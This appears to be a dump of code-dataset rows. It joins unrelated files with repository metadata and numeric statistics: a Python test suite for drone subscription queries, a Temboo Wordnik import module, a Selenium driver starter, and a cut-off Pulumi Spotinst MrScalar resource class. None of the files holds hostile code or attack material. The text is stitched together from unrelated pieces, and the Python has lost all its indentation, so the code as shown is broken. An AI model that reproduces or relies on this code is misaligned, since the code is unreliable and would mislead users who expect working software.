| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d55427688a084bec0e9255b152935a5e5812cfae
| 8,526
|
py
|
Python
|
monitoring/prober/scd/test_subscription_queries.py
|
rpai1/dss
|
79d8110c336851b155a6e5417692ec68b70c0c07
|
[
"Apache-2.0"
] | 1
|
2021-03-06T19:31:04.000Z
|
2021-03-06T19:31:04.000Z
|
monitoring/prober/scd/test_subscription_queries.py
|
rpai1/dss
|
79d8110c336851b155a6e5417692ec68b70c0c07
|
[
"Apache-2.0"
] | null | null | null |
monitoring/prober/scd/test_subscription_queries.py
|
rpai1/dss
|
79d8110c336851b155a6e5417692ec68b70c0c07
|
[
"Apache-2.0"
] | 1
|
2020-09-20T22:15:36.000Z
|
2020-09-20T22:15:36.000Z
|
"""Strategic conflict detection Subscription query tests:
- add a few Subscriptions spaced in time and footprints
- query with various combinations of arguments
"""
import datetime
from monitoring.monitorlib.infrastructure import default_scope
from monitoring.monitorlib import scd
from monitoring.monitorlib.scd import SCOPE_SC
SUB1_ID = '00000088-b268-481c-a32d-6be442000000'
SUB2_ID = '00000017-a3fe-42d6-9f3b-83dec2000000'
SUB3_ID = '0000001b-9c8a-475e-a82d-d81922000000'
LAT0 = 23
LNG0 = 56
# This value should be large enough to ensure areas separated by this distance
# will lie in separate grid cells.
FOOTPRINT_SPACING_M = 10000
def _make_sub1_req():
time_start = datetime.datetime.utcnow()
time_end = time_start + datetime.timedelta(minutes=60)
lat = LAT0 - scd.latitude_degrees(FOOTPRINT_SPACING_M)
return {
"extents": scd.make_vol4(None, time_end, 0, 300, scd.make_circle(lat, LNG0, 100)),
"old_version": 0,
"uss_base_url": "https://example.com/foo",
"notify_for_operations": True,
"notify_for_constraints": False
}
def _make_sub2_req():
time_start = datetime.datetime.utcnow() + datetime.timedelta(hours=2)
time_end = time_start + datetime.timedelta(minutes=60)
return {
"extents": scd.make_vol4(time_start, time_end, 350, 650, scd.make_circle(LAT0, LNG0, 100)),
"old_version": 0,
"uss_base_url": "https://example.com/foo",
"notify_for_operations": True,
"notify_for_constraints": False
}
def _make_sub3_req():
time_start = datetime.datetime.utcnow() + datetime.timedelta(hours=4)
time_end = time_start + datetime.timedelta(minutes=60)
lat = LAT0 + scd.latitude_degrees(FOOTPRINT_SPACING_M)
return {
"extents": scd.make_vol4(time_start, time_end, 700, 1000, scd.make_circle(lat, LNG0, 100)),
"old_version": 0,
"uss_base_url": "https://example.com/foo",
"notify_for_operations": True,
"notify_for_constraints": False
}
def test_ensure_clean_workspace(scd_session):
for sub_id in (SUB1_ID, SUB2_ID, SUB3_ID):
resp = scd_session.get('/subscriptions/{}'.format(sub_id), scope=SCOPE_SC)
if resp.status_code == 200:
resp = scd_session.delete('/subscriptions/{}'.format(sub_id), scope=SCOPE_SC)
assert resp.status_code == 200, resp.content
elif resp.status_code == 404:
# As expected.
pass
else:
assert False, resp.content
# Preconditions: No named Subscriptions exist
# Mutations: None
@default_scope(SCOPE_SC)
def test_subs_do_not_exist_get(scd_session):
for sub_id in (SUB1_ID, SUB2_ID, SUB3_ID):
resp = scd_session.get('/subscriptions/{}'.format(sub_id))
assert resp.status_code == 404, resp.content
# Preconditions: No named Subscriptions exist
# Mutations: None
@default_scope(SCOPE_SC)
def test_subs_do_not_exist_query(scd_session):
resp = scd_session.post('/subscriptions/query', json={
'area_of_interest': scd.make_vol4(None, None, 0, 5000, scd.make_circle(LAT0, LNG0, FOOTPRINT_SPACING_M))
})
assert resp.status_code == 200, resp.content
result_ids = [x['id'] for x in resp.json()['subscriptions']]
for sub_id in (SUB1_ID, SUB2_ID, SUB3_ID):
assert sub_id not in result_ids
# Preconditions: No named Subscriptions exist
# Mutations: Subscriptions 1, 2, and 3 created
@default_scope(SCOPE_SC)
def test_create_subs(scd_session):
resp = scd_session.put('/subscriptions/{}'.format(SUB1_ID), json=_make_sub1_req())
assert resp.status_code == 200, resp.content
resp = scd_session.put('/subscriptions/{}'.format(SUB2_ID), json=_make_sub2_req())
assert resp.status_code == 200, resp.content
resp = scd_session.put('/subscriptions/{}'.format(SUB3_ID), json=_make_sub3_req())
assert resp.status_code == 200, resp.content
# Preconditions: Subscriptions 1, 2, and 3 created
# Mutations: None
@default_scope(SCOPE_SC)
def test_search_find_all_subs(scd_session):
resp = scd_session.post(
'/subscriptions/query',
json={
"area_of_interest": scd.make_vol4(None, None, 0, 3000,
scd.make_circle(LAT0, LNG0, FOOTPRINT_SPACING_M))
})
assert resp.status_code == 200, resp.content
result_ids = [x['id'] for x in resp.json()['subscriptions']]
for sub_id in (SUB1_ID, SUB2_ID, SUB3_ID):
assert sub_id in result_ids
# Preconditions: Subscriptions 1, 2, and 3 created
# Mutations: None
@default_scope(SCOPE_SC)
def test_search_footprint(scd_session):
lat = LAT0 - scd.latitude_degrees(FOOTPRINT_SPACING_M)
print(lat)
resp = scd_session.post(
'/subscriptions/query',
json={
"area_of_interest": scd.make_vol4(None, None, 0, 3000,
scd.make_circle(lat, LNG0, 50))
})
assert resp.status_code == 200, resp.content
result_ids = [x['id'] for x in resp.json()['subscriptions']]
assert SUB1_ID in result_ids
assert SUB2_ID not in result_ids
assert SUB3_ID not in result_ids
resp = scd_session.post(
'/subscriptions/query',
json={
"area_of_interest": scd.make_vol4(None, None, 0, 3000,
scd.make_circle(LAT0, LNG0, 50))
})
assert resp.status_code == 200, resp.content
result_ids = [x['id'] for x in resp.json()['subscriptions']]
assert SUB1_ID not in result_ids
assert SUB2_ID in result_ids
assert SUB3_ID not in result_ids
# Preconditions: Subscriptions 1, 2, and 3 created
# Mutations: None
@default_scope(SCOPE_SC)
def test_search_time(scd_session):
time_start = datetime.datetime.utcnow()
time_end = time_start + datetime.timedelta(minutes=1)
resp = scd_session.post(
'/subscriptions/query',
json={
"area_of_interest": scd.make_vol4(time_start, time_end, 0, 3000,
scd.make_circle(LAT0, LNG0, FOOTPRINT_SPACING_M))
})
assert resp.status_code == 200, resp.content
result_ids = [x['id'] for x in resp.json()['subscriptions']]
assert SUB1_ID in result_ids
assert SUB2_ID not in result_ids
assert SUB3_ID not in result_ids
resp = scd_session.post(
'/subscriptions/query',
json={
"area_of_interest": scd.make_vol4(None, time_end, 0, 3000,
scd.make_circle(LAT0, LNG0, FOOTPRINT_SPACING_M))
})
assert resp.status_code == 200, resp.content
result_ids = [x['id'] for x in resp.json()['subscriptions']]
assert SUB1_ID in result_ids
assert SUB2_ID not in result_ids
assert SUB3_ID not in result_ids
time_start = datetime.datetime.utcnow() + datetime.timedelta(hours=4)
time_end = time_start + datetime.timedelta(minutes=1)
resp = scd_session.post(
'/subscriptions/query',
json={
"area_of_interest": scd.make_vol4(time_start, time_end, 0, 3000,
scd.make_circle(LAT0, LNG0, FOOTPRINT_SPACING_M))
})
assert resp.status_code == 200, resp.content
result_ids = [x['id'] for x in resp.json()['subscriptions']]
assert SUB1_ID not in result_ids
assert SUB2_ID not in result_ids
assert SUB3_ID in result_ids
resp = scd_session.post(
'/subscriptions/query',
json={
"area_of_interest": scd.make_vol4(time_start, None, 0, 3000,
scd.make_circle(LAT0, LNG0, FOOTPRINT_SPACING_M))
})
assert resp.status_code == 200, resp.content
result_ids = [x['id'] for x in resp.json()['subscriptions']]
assert SUB1_ID not in result_ids
assert SUB2_ID not in result_ids
assert SUB3_ID in result_ids
# Preconditions: Subscriptions 1, 2, and 3 created
# Mutations: None
@default_scope(SCOPE_SC)
def test_search_time_footprint(scd_session):
time_start = datetime.datetime.utcnow()
time_end = time_start + datetime.timedelta(hours=2.5)
lat = LAT0 + scd.latitude_degrees(FOOTPRINT_SPACING_M)
resp = scd_session.post(
'/subscriptions/query',
json={
"area_of_interest": scd.make_vol4(time_start, time_end, 0, 3000,
scd.make_circle(lat, LNG0, FOOTPRINT_SPACING_M))
})
assert resp.status_code == 200, resp.content
result_ids = [x['id'] for x in resp.json()['subscriptions']]
assert SUB1_ID not in result_ids
assert SUB2_ID in result_ids
assert SUB3_ID not in result_ids
# Preconditions: Subscriptions 1, 2, and 3 created
# Mutations: Subscriptions 1, 2, and 3 deleted
@default_scope(SCOPE_SC)
def test_delete_subs(scd_session):
for sub_id in (SUB1_ID, SUB2_ID, SUB3_ID):
resp = scd_session.delete('/subscriptions/{}'.format(sub_id))
assert resp.status_code == 200, resp.content
| 34.518219
| 108
| 0.700563
| 1,222
| 8,526
| 4.630115
| 0.135843
| 0.050901
| 0.044715
| 0.045069
| 0.86444
| 0.858431
| 0.820431
| 0.804525
| 0.755567
| 0.735242
| 0
| 0.047887
| 0.18684
| 8,526
| 246
| 109
| 34.658537
| 0.76821
| 0.099109
| 0
| 0.710383
| 0
| 0
| 0.127287
| 0.030972
| 0
| 0
| 0
| 0
| 0.213115
| 1
| 0.065574
| false
| 0.005464
| 0.021858
| 0
| 0.103825
| 0.016393
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d5837ed5c9e1f4853a3b61828f36313098836798
| 571
|
py
|
Python
|
temboo/core/Library/Wordnik/Account/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Wordnik/Account/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Wordnik/Account/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Wordnik.Account.GetAuthToken import GetAuthToken, GetAuthTokenInputSet, GetAuthTokenResultSet, GetAuthTokenChoreographyExecution
from temboo.Library.Wordnik.Account.GetKeyStatus import GetKeyStatus, GetKeyStatusInputSet, GetKeyStatusResultSet, GetKeyStatusChoreographyExecution
from temboo.Library.Wordnik.Account.GetUser import GetUser, GetUserInputSet, GetUserResultSet, GetUserChoreographyExecution
from temboo.Library.Wordnik.Account.GetWordLists import GetWordLists, GetWordListsInputSet, GetWordListsResultSet, GetWordListsChoreographyExecution
| 114.2
| 148
| 0.901926
| 44
| 571
| 11.704545
| 0.5
| 0.07767
| 0.132039
| 0.186408
| 0.240777
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.049037
| 571
| 4
| 149
| 142.75
| 0.948435
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d5a4573d5ae49df24e84bfdf833cc441272c4eb6
| 176
|
py
|
Python
|
services/startDriver.py
|
nayfaan/Google_rank_find
|
77815b0f710ec4456f70a63b3359c02fd24753a8
|
[
"MIT"
] | null | null | null |
services/startDriver.py
|
nayfaan/Google_rank_find
|
77815b0f710ec4456f70a63b3359c02fd24753a8
|
[
"MIT"
] | null | null | null |
services/startDriver.py
|
nayfaan/Google_rank_find
|
77815b0f710ec4456f70a63b3359c02fd24753a8
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium import *
def start():
return webdriver.Chrome(executable_path='./services/chromedriver')
if __name__ == "__main__":
pass
| 19.555556
| 70
| 0.744318
| 20
| 176
| 6.1
| 0.8
| 0.196721
| 0.295082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153409
| 176
| 8
| 71
| 22
| 0.818792
| 0
| 0
| 0
| 0
| 0
| 0.176136
| 0.130682
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0.166667
| 0.333333
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
|
0
| 8
|
635cce5473f8750091e7f18d6db45331eaca5c07
| 174,251
|
py
|
Python
|
sdk/python/pulumi_spotinst/aws/mr_scalar.py
|
pulumi/pulumi-spotinst
|
75592d6293d63f6cec703722f2e02ff1fb1cca44
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2019-12-21T20:50:43.000Z
|
2021-12-01T20:57:38.000Z
|
sdk/python/pulumi_spotinst/aws/mr_scalar.py
|
pulumi/pulumi-spotinst
|
75592d6293d63f6cec703722f2e02ff1fb1cca44
|
[
"ECL-2.0",
"Apache-2.0"
] | 103
|
2019-12-09T22:03:16.000Z
|
2022-03-30T17:07:34.000Z
|
sdk/python/pulumi_spotinst/aws/mr_scalar.py
|
pulumi/pulumi-spotinst
|
75592d6293d63f6cec703722f2e02ff1fb1cca44
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MrScalarArgs', 'MrScalar']
@pulumi.input_type
class MrScalarArgs:
def __init__(__self__, *,
strategy: pulumi.Input[str],
additional_info: Optional[pulumi.Input[str]] = None,
additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
applications: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]] = None,
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]] = None,
core_desired_capacity: Optional[pulumi.Input[int]] = None,
core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]] = None,
core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
core_lifecycle: Optional[pulumi.Input[str]] = None,
core_max_size: Optional[pulumi.Input[int]] = None,
core_min_size: Optional[pulumi.Input[int]] = None,
core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]] = None,
core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]] = None,
core_unit: Optional[pulumi.Input[str]] = None,
custom_ami_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
ec2_key_name: Optional[pulumi.Input[str]] = None,
expose_cluster_id: Optional[pulumi.Input[bool]] = None,
instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]] = None,
job_flow_role: Optional[pulumi.Input[str]] = None,
keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
log_uri: Optional[pulumi.Input[str]] = None,
managed_primary_security_group: Optional[pulumi.Input[str]] = None,
managed_replica_security_group: Optional[pulumi.Input[str]] = None,
master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]] = None,
master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
master_lifecycle: Optional[pulumi.Input[str]] = None,
master_target: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
provisioning_timeout: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']] = None,
region: Optional[pulumi.Input[str]] = None,
release_label: Optional[pulumi.Input[str]] = None,
repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]] = None,
security_config: Optional[pulumi.Input[str]] = None,
service_access_security_group: Optional[pulumi.Input[str]] = None,
service_role: Optional[pulumi.Input[str]] = None,
steps_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]] = None,
task_desired_capacity: Optional[pulumi.Input[int]] = None,
task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]] = None,
task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
task_lifecycle: Optional[pulumi.Input[str]] = None,
task_max_size: Optional[pulumi.Input[int]] = None,
task_min_size: Optional[pulumi.Input[int]] = None,
task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]] = None,
task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]] = None,
task_unit: Optional[pulumi.Input[str]] = None,
termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]] = None,
termination_protected: Optional[pulumi.Input[bool]] = None,
visible_to_all_users: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a MrScalar resource.
:param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
:param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[str] cluster_id: The MrScaler cluster id.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
:param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
:param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
:param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
:param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
:param pulumi.Input[str] description: The MrScaler description.
:param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
:param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
:param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
:param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
:param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
:param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
:param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
:param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
:param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] master_target: Number of instances in the master group.
:param pulumi.Input[str] name: The application name.
:param pulumi.Input[str] region: The MrScaler region.
:param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
:param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]] scheduled_tasks: An array of scheduled tasks.
:param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
:param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
:param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]] steps_files: Steps from S3.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]] tags: A list of tags to assign to the resource. You may define multiple tags.
:param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
:param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
:param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
:param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
:param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
:param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
pulumi.set(__self__, "strategy", strategy)
if additional_info is not None:
pulumi.set(__self__, "additional_info", additional_info)
if additional_primary_security_groups is not None:
pulumi.set(__self__, "additional_primary_security_groups", additional_primary_security_groups)
if additional_replica_security_groups is not None:
pulumi.set(__self__, "additional_replica_security_groups", additional_replica_security_groups)
if applications is not None:
pulumi.set(__self__, "applications", applications)
if availability_zones is not None:
pulumi.set(__self__, "availability_zones", availability_zones)
if bootstrap_actions_files is not None:
pulumi.set(__self__, "bootstrap_actions_files", bootstrap_actions_files)
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if configurations_files is not None:
pulumi.set(__self__, "configurations_files", configurations_files)
if core_desired_capacity is not None:
pulumi.set(__self__, "core_desired_capacity", core_desired_capacity)
if core_ebs_block_devices is not None:
pulumi.set(__self__, "core_ebs_block_devices", core_ebs_block_devices)
if core_ebs_optimized is not None:
pulumi.set(__self__, "core_ebs_optimized", core_ebs_optimized)
if core_instance_types is not None:
pulumi.set(__self__, "core_instance_types", core_instance_types)
if core_lifecycle is not None:
pulumi.set(__self__, "core_lifecycle", core_lifecycle)
if core_max_size is not None:
pulumi.set(__self__, "core_max_size", core_max_size)
if core_min_size is not None:
pulumi.set(__self__, "core_min_size", core_min_size)
if core_scaling_down_policies is not None:
pulumi.set(__self__, "core_scaling_down_policies", core_scaling_down_policies)
if core_scaling_up_policies is not None:
pulumi.set(__self__, "core_scaling_up_policies", core_scaling_up_policies)
if core_unit is not None:
pulumi.set(__self__, "core_unit", core_unit)
if custom_ami_id is not None:
pulumi.set(__self__, "custom_ami_id", custom_ami_id)
if description is not None:
pulumi.set(__self__, "description", description)
if ebs_root_volume_size is not None:
pulumi.set(__self__, "ebs_root_volume_size", ebs_root_volume_size)
if ec2_key_name is not None:
pulumi.set(__self__, "ec2_key_name", ec2_key_name)
if expose_cluster_id is not None:
pulumi.set(__self__, "expose_cluster_id", expose_cluster_id)
if instance_weights is not None:
pulumi.set(__self__, "instance_weights", instance_weights)
if job_flow_role is not None:
pulumi.set(__self__, "job_flow_role", job_flow_role)
if keep_job_flow_alive is not None:
pulumi.set(__self__, "keep_job_flow_alive", keep_job_flow_alive)
if log_uri is not None:
pulumi.set(__self__, "log_uri", log_uri)
if managed_primary_security_group is not None:
pulumi.set(__self__, "managed_primary_security_group", managed_primary_security_group)
if managed_replica_security_group is not None:
pulumi.set(__self__, "managed_replica_security_group", managed_replica_security_group)
if master_ebs_block_devices is not None:
pulumi.set(__self__, "master_ebs_block_devices", master_ebs_block_devices)
if master_ebs_optimized is not None:
pulumi.set(__self__, "master_ebs_optimized", master_ebs_optimized)
if master_instance_types is not None:
pulumi.set(__self__, "master_instance_types", master_instance_types)
if master_lifecycle is not None:
pulumi.set(__self__, "master_lifecycle", master_lifecycle)
if master_target is not None:
pulumi.set(__self__, "master_target", master_target)
if name is not None:
pulumi.set(__self__, "name", name)
if provisioning_timeout is not None:
pulumi.set(__self__, "provisioning_timeout", provisioning_timeout)
if region is not None:
pulumi.set(__self__, "region", region)
if release_label is not None:
pulumi.set(__self__, "release_label", release_label)
if repo_upgrade_on_boot is not None:
pulumi.set(__self__, "repo_upgrade_on_boot", repo_upgrade_on_boot)
if retries is not None:
pulumi.set(__self__, "retries", retries)
if scheduled_tasks is not None:
pulumi.set(__self__, "scheduled_tasks", scheduled_tasks)
if security_config is not None:
pulumi.set(__self__, "security_config", security_config)
if service_access_security_group is not None:
pulumi.set(__self__, "service_access_security_group", service_access_security_group)
if service_role is not None:
pulumi.set(__self__, "service_role", service_role)
if steps_files is not None:
pulumi.set(__self__, "steps_files", steps_files)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if task_desired_capacity is not None:
pulumi.set(__self__, "task_desired_capacity", task_desired_capacity)
if task_ebs_block_devices is not None:
pulumi.set(__self__, "task_ebs_block_devices", task_ebs_block_devices)
if task_ebs_optimized is not None:
pulumi.set(__self__, "task_ebs_optimized", task_ebs_optimized)
if task_instance_types is not None:
pulumi.set(__self__, "task_instance_types", task_instance_types)
if task_lifecycle is not None:
pulumi.set(__self__, "task_lifecycle", task_lifecycle)
if task_max_size is not None:
pulumi.set(__self__, "task_max_size", task_max_size)
if task_min_size is not None:
pulumi.set(__self__, "task_min_size", task_min_size)
if task_scaling_down_policies is not None:
pulumi.set(__self__, "task_scaling_down_policies", task_scaling_down_policies)
if task_scaling_up_policies is not None:
pulumi.set(__self__, "task_scaling_up_policies", task_scaling_up_policies)
if task_unit is not None:
pulumi.set(__self__, "task_unit", task_unit)
if termination_policies is not None:
pulumi.set(__self__, "termination_policies", termination_policies)
if termination_protected is not None:
pulumi.set(__self__, "termination_protected", termination_protected)
if visible_to_all_users is not None:
warnings.warn("""This field has been removed from our API and is no longer functional.""", DeprecationWarning)
pulumi.log.warn("""visible_to_all_users is deprecated: This field has been removed from our API and is no longer functional.""")
if visible_to_all_users is not None:
pulumi.set(__self__, "visible_to_all_users", visible_to_all_users)
@property
@pulumi.getter
def strategy(self) -> pulumi.Input[str]:
"""
The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
"""
return pulumi.get(self, "strategy")
@strategy.setter
def strategy(self, value: pulumi.Input[str]):
pulumi.set(self, "strategy", value)
@property
@pulumi.getter(name="additionalInfo")
def additional_info(self) -> Optional[pulumi.Input[str]]:
"""
This is meta information about third-party applications that third-party vendors use for testing purposes.
"""
return pulumi.get(self, "additional_info")
@additional_info.setter
def additional_info(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "additional_info", value)
@property
@pulumi.getter(name="additionalPrimarySecurityGroups")
